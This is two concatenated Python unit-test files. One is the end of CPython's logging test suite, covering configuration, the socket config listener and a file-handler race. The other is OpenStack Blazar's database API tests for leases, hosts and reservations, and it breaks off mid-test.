self.assert_log_lines([])
def test_config2_failure(self):
# config2 points its handler at a non-existent stream (sys.stdbout).
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config2a_failure(self):
# config2a has a misspelt level ('NTOSET') on a handler.
self.assertRaises(StandardError, self.apply_config, self.config2a)
def test_config2b_failure(self):
# config2b has a misspelt level ('WRANING') on the root logger.
self.assertRaises(StandardError, self.apply_config, self.config2b)
def test_config3_failure(self):
# config3 refers to a formatter name that is never defined.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
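# The listener started by logging.config.listen() reads a 4-byte
# big-endian length prefix ('>L') and then exactly that many bytes of
# configuration data, so frame the payload accordingly.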
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class HandlerTest(BaseTest):
@unittest.skipIf(os.name == 'nt' or (os.name == 'java' and os._name == 'nt'),
'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
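# A background thread repeatedly unlinks the log file while the
# handler writes, exercising WatchedFileHandler's reopen-on-change
# logic under concurrent deletion.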
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
try:
h.close()
except ValueError:
pass
if os.path.exists(fn):
os.unlink(fn)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
ChildLoggerTest, HandlerTest)
if __name__ == "__main__":
test_main()
# Copyright (c) 2013 Bull.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import operator
from oslo_utils import uuidutils
from blazar.db import exceptions as db_exceptions
from blazar.db.sqlalchemy import api as db_api
from blazar.db.sqlalchemy import models
from blazar.plugins import oshosts as host_plugin
from blazar import tests
def _get_fake_random_uuid():
return uuidutils.generate_uuid()
def _get_fake_lease_uuid():
"""Returns a fake uuid."""
return 'aaaaaaaa-1111-bbbb-2222-cccccccccccc'
def _get_fake_phys_reservation_values(id=None,
lease_id=_get_fake_lease_uuid(),
resource_id=None):
if id is None:
id = _get_fake_random_uuid()
return {'id': id,
'lease_id': lease_id,
'resource_id': '1234' if not resource_id else resource_id,
'resource_type': host_plugin.RESOURCE_TYPE,
'hypervisor_properties': '[\"=\", \"$hypervisor_type\", \"QEMU\"]',
'resource_properties': '',
'min': 1, 'max': 1,
'trust_id': 'exxee111qwwwwe'}
def _get_fake_event_values(id=None,
lease_id=_get_fake_lease_uuid(),
event_type='fake_event_type',
time=None,
status='fake_event_status'):
if id is None:
id = _get_fake_random_uuid()
return {'id': id,
'lease_id': lease_id,
'event_type': event_type,
'time': _get_datetime('2030-03-01 00:00') if not time else time,
'status': status}
def _get_datetime(value='2030-01-01 00:00'):
return datetime.datetime.strptime(value, '%Y-%m-%d %H:%M')
def _get_fake_phys_lease_values(id=None,
name='fake_phys_lease',
start_date=_get_datetime('2030-01-01 00:00'),
end_date=_get_datetime('2030-01-02 00:00'),
resource_id=None):
if id is None:
id = _get_fake_random_uuid()
return {'id': id,
'name': name,
'user_id': 'fake',
'project_id': 'fake',
'start_date': start_date,
'end_date': end_date,
'trust': 'trust',
'reservations': [_get_fake_phys_reservation_values(
id=_get_fake_random_uuid(),
lease_id=id,
resource_id=resource_id)],
'events': []
}
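# Note: the uuid defaults below are evaluated once at import time (the
# usual Python default-argument pitfall), so calls omitting them share
# the same compute_host_id and reservation_id for the whole run.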
def _get_fake_host_allocation_values(
id=None,
compute_host_id=_get_fake_random_uuid(),
reservation_id=_get_fake_random_uuid()):
values = {'compute_host_id': compute_host_id,
'reservation_id': reservation_id}
if id is not None:
values.update({'id': id})
return values
def _create_physical_lease(values=None, random=False):
"""Create a fake lease having a single physical resource."""
if values is None:
values = _get_fake_phys_lease_values()
if random is True:
values = _get_fake_phys_lease_values(id=_get_fake_random_uuid(),
name=_get_fake_random_uuid())
lease = db_api.lease_create(values)
phys_res = _get_fake_phys_reservation_values()
for reservation in db_api.reservation_get_all_by_lease_id(lease['id']):
allocation_values = {
'id': _get_fake_random_uuid(),
'compute_host_id': values['reservations'][0]['resource_id'],
'reservation_id': reservation['id']
}
db_api.host_allocation_create(allocation_values)
computehost_reservation = {
'id': _get_fake_random_uuid(),
'reservation_id': values['reservations'][0]['id'],
'resource_properties': phys_res['resource_properties'],
'hypervisor_properties': phys_res['hypervisor_properties'],
'count_range': "{0} - {1}".format(phys_res['min'],
phys_res['max'])
}
db_api.host_reservation_create(computehost_reservation)
return lease
def _get_fake_host_reservation_values(id=None, reservation_id=None):
if id is None:
id = _get_fake_random_uuid()
if reservation_id is None:
reservation_id = _get_fake_random_uuid()
return {'id': id,
'reservation_id': reservation_id,
'resource_properties': "fake",
'hypervisor_properties': "fake",
'min': 1, 'max': 1,
'trust_id': 'exxee111qwwwwe'}
def _get_fake_instance_values(id=None, reservation_id=None):
if id is None:
id = _get_fake_random_uuid()
if reservation_id is None:
reservation_id = _get_fake_random_uuid()
return {'id': id,
'reservation_id': reservation_id,
'vcpus': 1,
'memory_mb': 2024,
'disk_gb': 100,
'amount': 2,
'affinity': False,
'flavor_id': 'fake_flavor_id',
'aggregate_id': 29,
'server_group_id': 'server_group_id'}
def _get_fake_cpu_info():
return str({'vendor': 'Intel',
'model': 'Westmere',
'arch': 'x86_64',
'features': ['rdtscp', 'pdpe1gb', 'hypervisor', 'vmx', 'ss',
'vme'],
'topology': {'cores': 1, 'threads': 1, 'sockets': 2}})
def _get_fake_host_values(id=None, mem=8192, disk=10):
if id is None:
id = _get_fake_random_uuid()
return {'id': id,
'availability_zone': 'az1',
'vcpus': 1,
'cpu_info': _get_fake_cpu_info(),
'hypervisor_type': 'QEMU',
'hypervisor_version': 1000,
'memory_mb': mem,
'local_gb': disk,
'status': 'free',
'trust_id': 'exxee111qwwwwe',
}
def _get_fake_host_extra_capabilities(id=None,
computehost_id=None,
name='vgpu',
value='2'):
if id is None:
id = _get_fake_random_uuid()
if computehost_id is None:
computehost_id = _get_fake_random_uuid()
return {'id': id,
'computehost_id': computehost_id,
'capability_name': name,
'capability_value': value}
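# Helper for the sorted-query tests: re-sorts the results with
# operator.itemgetter and compares with the order the DB API returned.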
def is_result_sorted_correctly(results, sort_key, sort_dir='asc'):
sorted_list = sorted(results,
key=operator.itemgetter(sort_key),
reverse=False if sort_dir == 'asc' else True)
return sorted_list == results
class SQLAlchemyDBApiTestCase(tests.DBTestCase):
"""Test case for SQLAlchemy DB API."""
def setUp(self):
super(SQLAlchemyDBApiTestCase, self).setUp()
def test_model_query(self):
lease = db_api.lease_create(_get_fake_phys_lease_values())
query = db_api.model_query(models.Lease)
self.assertEqual([lease.to_dict()], [l.to_dict() for l in query.all()])
def test_create_phys_lease(self):
"""Check physical lease create
Create a physical lease and verify that all tables have been
populated.
"""
result = db_api.lease_create(_get_fake_phys_lease_values())
self.assertEqual(result['name'],
_get_fake_phys_lease_values()['name'])
self.assertEqual(0, len(db_api.event_get_all()))
self.assertEqual(1, len(db_api.reservation_get_all()))
def test_create_duplicate_leases(self):
"""Create two leases with same ids, and checks it raises an error."""
db_api.lease_create(_get_fake_phys_lease_values(id='42'))
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.lease_create,
_get_fake_phys_lease_values(id='42'))
def test_create_leases_with_duplicated_reservation(self):
"""Check duplicated reservation create
Create two leases with a duplicated reservation,
and checks it raises an error.
"""
lease_values = _get_fake_phys_lease_values()
db_api.lease_create(lease_values)
lease_values['id'] = _get_fake_random_uuid()
lease_values['name'] = 'duplicated_reservation'
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.lease_create,
lease_values)
def test_create_leases_with_duplicated_event(self):
"""Check duplicated event create
Create two leases with a duplicated event,
and checks it raises an error.
"""
lease_values = _get_fake_phys_lease_values()
lease_values['events'] = [_get_fake_event_values()]
db_api.lease_create(lease_values)
lease_values['id'] = _get_fake_random_uuid()
lease_values['name'] = 'duplicated_event'
lease_values['reservations'][0]['id'] = _get_fake_random_uuid()
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.lease_create,
lease_values)
def test_create_lease_with_event(self):
"""Create a lease including a fake event and check all tables."""
lease = _get_fake_phys_lease_values()
lease['events'].append(_get_fake_event_values(lease_id=lease['id']))
result = db_api.lease_create(lease)
self.assertEqual(result['name'],
_get_fake_phys_lease_values()['name'])
self.assertEqual(1, len(db_api.event_get_all()))
def test_delete_wrong_lease(self):
"""Delete a lease that doesn't exist and check that raises an error."""
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.lease_destroy, 'fake_id')
def test_get_physical_lease(self):
"""Test if physical host reservation contains data of reservation."""
lease = _get_fake_phys_lease_values()
lease['events'].append(_get_fake_event_values(lease_id=lease['id']))
result = _create_physical_lease(values=lease)
result = db_api.lease_get(result['id'])
res = result.to_dict()
self.assertEqual(res['reservations'][0]['hypervisor_properties'],
lease['reservations'][0]['hypervisor_properties'])
self.assertEqual(res['reservations'][0]['resource_properties'],
lease['reservations'][0]['resource_properties'])
self.assertEqual(res['reservations'][0]['min'],
lease['reservations'][0]['min'])
self.assertEqual(res['reservations'][0]['max'],
lease['reservations'][0]['max'])
def test_delete_correct_lease(self):
"""Delete a lease and check that deletion has been cascaded to FKs."""
lease = _get_fake_phys_lease_values()
lease['events'].append(_get_fake_event_values(lease_id=lease['id']))
result = _create_physical_lease(values=lease)
db_api.lease_destroy(result['id'])
self.assertIsNone(db_api.lease_get(result['id']))
self.assertEqual(0, len(db_api.reservation_get_all()))
self.assertEqual(0, len(db_api.event_get_all()))
def test_lease_get_all(self):
"""Check the number of leases we get."""
_create_physical_lease(random=True)
self.assertEqual(1, len(db_api.lease_get_all()))
_create_physical_lease(random=True)
self.assertEqual(2, len(db_api.lease_get_all()))
def test_lease_list(self):
"""Not implemented yet until lease_list returns list of IDs."""
# TODO(sbauza): Enable this test when lease_list will return only IDs
self.assertTrue(True)
return
_create_physical_lease(
values=_get_fake_phys_lease_values(id='1', name='fake1'))
_create_physical_lease(
values=_get_fake_phys_lease_values(id='2', name='fake2'))
self.assertEqual(['1', '2'], db_api.lease_list())
def test_lease_update(self):
"""Update both start_time and name and check lease has been updated."""
result = _create_physical_lease()
result = db_api.lease_update(result['id'],
values={'name': 'lease_renamed'})
self.assertEqual('lease_renamed', result['name'])
result = db_api.lease_update(
result['id'],
values={'start_date': _get_datetime('2014-02-01 00:00')})
self.assertEqual(_get_datetime('2014-02-01 00:00'),
result['start_date'])
# Reservations
def test_create_reservation(self):
"""Create and verify reservation
Create a reservation and verify that all tables have been
populated.
"""
result = db_api.reservation_create(_get_fake_phys_reservation_values())
self.assertEqual(result['lease_id'],
_get_fake_phys_reservation_values()
['lease_id'])
def test_reservation_get_all_by_values(self):
"""Create 2 reservations and check find abilities
Create two reservations and verify that we can find reservation per
resource_id or resource_type.
"""
db_api.reservation_create(
_get_fake_phys_reservation_values(id='1', resource_id='1234'))
db_api.reservation_create(
_get_fake_phys_reservation_values(id='2', resource_id='5678'))
self.assertEqual(2, len(db_api.reservation_get_all_by_values()))
self.assertEqual(1, len(db_api.reservation_get_all_by_values(
resource_id='5678')))
self.assertEqual(2, len(db_api.reservation_get_all_by_values(
resource_type=host_plugin.RESOURCE_TYPE)))
def test_reservation_update(self):
result = db_api.reservation_create(_get_fake_phys_reservation_values())
self.assertNotEqual('fake', result.resource_type)
result = db_api.reservation_update(result.id,
{"resource_type": 'fake'})
self.assertEqual('fake', result.resource_type)
def test_reservation_destroy_for_reservation_not_found(self):
self.assertFalse(db_api.reservation_get('1'))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.reservation_destroy, '1')
def test_create_duplicate_reservation(self):
"""Create duplicated reservation
Create a reservation and verify that an exception is raised if a
duplicated reservation is created.
"""
uuid = _get_fake_random_uuid()
db_api.reservation_create(_get_fake_phys_reservation_values(id=uuid))
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.reservation_create,
_get_fake_phys_reservation_values(id=uuid))
# Host reservations
def test_create_host_reservation(self):
"""Create host reservation
Create a host reservation and verify that all tables
have been populated.
"""
result = db_api.host_reservation_create(
_get_fake_host_reservation_values(id='1'))
self.assertEqual(result['id'],
_get_fake_host_reservation_values(id='1')
['id'])
def test_create_duplicate_host_reservation(self):
"""Create duplicated host reservation
Create a duplicated host reservation and verify that an exception is
raised.
"""
db_api.host_reservation_create(
_get_fake_host_reservation_values(id='1'))
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.host_reservation_create,
_get_fake_host_reservation_values(id='1'))
def test_delete_host_reservation(self):
"""Check deletion for host reservation
Check all deletion cases for host reservation,
including cascade deletion from reservations table.
"""
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_reservation_destroy, 'fake_id')
result = db_api.host_reservation_create(
_get_fake_host_reservation_values())
db_api.host_reservation_destroy(result['id'])
self.assertIsNone(db_api.host_reservation_get(result['id']))
reserv = db_api.reservation_create(_get_fake_phys_reservation_values())
result = db_api.host_reservation_create(
_get_fake_host_reservation_values(reservation_id=reserv['id']))
db_api.reservation_destroy(reserv['id'])
self.assertIsNone(db_api.host_reservation_get(result['id']))
def test_host_reservation_get_all(self):
"""Check that we return 2 hosts."""
db_api.host_reservation_create(_get_fake_host_reservation_values(id=1))
db_api.host_reservation_create(_get_fake_host_reservation_values(id=2))
hosts_reservations = db_api.host_reservation_get_all()
self.assertEqual(['1', '2'], [x['id'] for x in hosts_reservations])
def test_host_reservation_get_by_reservation_id(self):
"""Check that we return 2 hosts."""
db_api.host_reservation_create(
_get_fake_host_reservation_values(id=1, reservation_id=1))
db_api.host_reservation_create(
_get_fake_host_reservation_values(id=2, reservation_id=2))
res = db_api.host_reservation_get_by_reservation_id(2)
self.assertEqual('2', res['id'])
def test_update_host_reservation(self):
db_api.host_reservation_create(_get_fake_host_reservation_values(id=1))
db_api.host_reservation_update(1, {'resource_properties': 'updated'})
res = db_api.host_reservation_get(1)
self.assertEqual('updated', res['resource_properties'])
def test_create_host(self):
"""Create a host and verify that all tables have been populated."""
result = db_api.host_create(_get_fake_host_values(id='1'))
self.assertEqual(result['id'], _get_fake_host_values(id='1')['id'])
def test_create_duplicated_host(self):
"""Create a duplicated host and verify that an exception is raised."""
db_api.host_create(_get_fake_host_values(id='1'))
# Make sure a BlazarDBDuplicateEntry is raised
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.host_create,
_get_fake_host_values(id='1'))
def test_search_for_hosts_by_ram(self):
"""Check RAM info search
Create two hosts and check that we can find a host per its RAM
info.
"""
db_api.host_create(_get_fake_host_values(id=1, mem=2048))
db_api.host_create(_get_fake_host_values(id=2, mem=4096))
self.assertEqual(2, len(
db_api.host_get_all_by_queries(['memory_mb >= 2048'])))
self.assertEqual(0, len(
db_api.host_get_all_by_queries(['memory_mb lt 2048'])))
def test_search_for_hosts_by_cpu_info(self):
"""Create one host and search within cpu_info."""
db_api.host_create(_get_fake_host_values())
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['cpu_info like %Westmere%'])))
def test_search_for_hosts_by_extra_capability(self):
"""Create one host and test extra capability queries."""
# We create a first host, with extra capabilities
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(computehost_id=1))
db_api.host_extra_capability_create(_get_fake_host_extra_capabilities(
computehost_id=1,
name='nic_model',
value='ACME Model A',
))
# We create a second host, without any extra capabilities
db_api.host_create(_get_fake_host_values(id=2))
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['vgpu == 2'])))
self.assertEqual(0, len(
db_api.host_get_all_by_queries(['vgpu != 2'])))
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['cpu_info like %Westmere%',
'vgpu == 2'])))
self.assertEqual(0, len(
db_api.host_get_all_by_queries(['cpu_info like %wrongcpu%',
'vgpu == 2'])))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_get_all_by_queries, ['apples < 2048'])
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['nic_model == ACME Model A'])
))
def test_search_for_hosts_by_composed_queries(self):
"""Create one host and test composed queries."""
db_api.host_create(_get_fake_host_values(mem=8192))
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['memory_mb > 2048',
'cpu_info like %Westmere%'])))
self.assertEqual(0, len(
db_api.host_get_all_by_queries(['memory_mb < 2048',
'cpu_info like %Westmere%'])))
self.assertRaises(db_exceptions.BlazarDBInvalidFilter,
db_api.host_get_all_by_queries, ['memory_mb <'])
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_get_all_by_queries, ['apples < 2048'])
self.assertRaises(db_exceptions.BlazarDBInvalidFilterOperator,
db_api.host_get_all_by_queries,
['memory_mb wrongop 2048'])
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['memory_mb in 4096,8192'])))
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['memory_mb != null'])))
def test_list_hosts(self):
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_create(_get_fake_host_values(id=2))
self.assertEqual(2, len(db_api.host_list()))
def test_get_hosts_per_filter(self):
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_create(_get_fake_host_values(id=2))
filters = {'status': 'free'}
self.assertEqual(2, len(
db_api.host_get_all_by_filters(filters)))
def test_update_host(self):
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_update(1, {'status': 'updated'})
self.assertEqual('updated', db_api.host_get(1)['status'])
def test_delete_host(self):
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_destroy(1)
self.assertIsNone(db_api.host_get(1))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_destroy, 2)
def test_create_host_extra_capability(self):
result = db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id=1))
self.assertEqual(result['id'], _get_fake_host_values(id='1')['id'])
def test_create_duplicated_host_extra_capability(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id=1))
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.host_extra_capability_create,
_get_fake_host_extra_capabilities(id='1'))
def test_get_host_extra_capability_per_id(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1'))
result = db_api.host_extra_capability_get('1')
self.assertEqual('1', result['id'])
def test_host_extra_capability_get_all_per_host(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1', computehost_id='1'))
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='2', computehost_id='1'))
res = db_api.host_extra_capability_get_all_per_host('1')
self.assertEqual(2, len(res))
def test_update_host_extra_capability(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1'))
db_api.host_extra_capability_update('1', {'capability_value': '2'})
res = db_api.host_extra_capability_get('1')
self.assertEqual('2', res['capability_value'])
def test_delete_host_extra_capability(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1'))
db_api.host_extra_capability_destroy('1')
self.assertIsNone(db_api.host_extra_capability_get('1'))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_extra_capability_destroy, '1')
def test_host_extra_capability_get_all_per_name(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1', computehost_id='1'))
res = db_api.host_extra_capability_get_all_per_name('1', 'vgpu')
self.assertEqual(1, len(res))
self.assertEqual([],
db_api.host_extra_capability_get_all_per_name('1',
'bad'))
# Instance reservation
def check_instance_reservation_values(self, expected, reservation_id):
inst_reservation = db_api.instance_reservation_get(reservation_id)
for k, v in expected.items():
self.assertEqual(v, inst_reservation[k])
def test_instance_reservation_create(self):
reservation_values = _get_fake_instance_values(id='1')
ret = db_api.instance_reservation_create(reservation_values)
self.assertEqual('1', ret['id'])
self.check_instance_reservation_values(reservation_values, '1')
def test_create_duplicated_instance_reservation(self):
reservation_values = _get_fake_instance_values(id='1')
db_api.instance_reservation_create(reservation_values)
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.instance_reservation_create,
reservation_values)
def test_instance_reservation_get(self):
reservation1_values = _get_fake_instance_values(id='1')
db_api.instance_reservation_create(reservation1_values)
reservation2_values = _get_fake_instance_values(id='2')
db_api.instance_reservation_create(reservation2_values)
self.check_instance_reservation_values(reservation1_values, '1')
self.check_instance_reservation_values(reservation2_values, '2')
def test_instance_reservation_update(self):
reservation_values = _get_fake_instance_values(id='1')
db_api.instance_reservation_create(reservation_values)
self.check_instance_reservation_values(reservation_values, '1')
updated_values = {
'flavor_id': 'updated-flavor-id',
'aggregate_id': 30,
'server_group_id': 'updated-server-group-id'
}
db_api.instance_reservation_update('1', updated_values)
reservation_values.update(updated_values)
self.check_instance_reservation_values(reservation_values, '1')
def test_update_non_existing_instance_reservation(self):
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.instance_reservation_destroy, 'non-exists')
def test_instance_reservation_destroy(self):
reservation_values = _get_fake_instance_values(id='1')
db_api.instance_reservation_create(reservation_values)
self.check_instance_reservation_values(reservation_values, '1')
db_api.instance_reservation_destroy('1')
self.assertIsNone(db_api.instance_reservation_get('1'))
def test_destroy_non_existing_instance_reservation(self):
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.instance_reservation_destroy, 'non-exists')
# Host allocations
def test_host_allocation_get_all(self):
self.assertFalse(db_api.host_allocation_get_all())
db_api.host_allocation_create(_get_fake_host_allocation_values(id='1'))
db_api.host_allocation_create(_get_fake_host_allocation_values(id='2'))
self.assertEqual(2, len(db_api.host_allocation_get_all()))
def test_host_allocation_create_for_duplicated_hosts(self):
db_api.host_allocation_create(
_get_fake_host_allocation_values(id='1')
)
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.host_allocation_create,
_get_fake_host_allocation_values(id='1'))
def test_host_allocation_update_for_host(self):
host_allocation = db_api.host_allocation_create(
_get_fake_host_allocation_values(
compute_host_id="1",
reservation_id="1"
))
new_host_allocation = db_api.host_allocation_update(
host_allocation.id,
_get_fake_host_allocation_values(
compute_host_id="2",
reservation_id="2"
))
self.assertEqual('2', new_host_allocation.compute_host_id)
self.assertEqual('2', new_host_allocation.reservation_id)
self.assertNotEqual(host_allocation.compute_host_id,
new_host_allocation.compute_host_id)
def test_host_allocation_destroy_for_host(self):
host_allocation = db_api.host_allocation_create(
_get_fake_host_allocation_values()
)
db_api.host_allocation_destroy(host_allocation.id)
self.assertIsNone(db_api.host_allocation_get(host_allocation.id))
def test_host_allocation_destroy_for_host_not_found(self):
host_allocation_id = _get_fake_random_uuid()
self.assertIsNone(db_api.host_allocation_get(host_allocation_id))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_allocation_destroy,
host_allocation_id)
def test_host_allocation_get_all_by_values(self):
db_api.host_allocation_create(_get_fake_host_allocation_values(
compute_host_id="1", reservation_id="1"))
db_api.host_allocation_create(_get_fake_host_allocation_values(
compute_host_id="1", reservation_id="1234"))
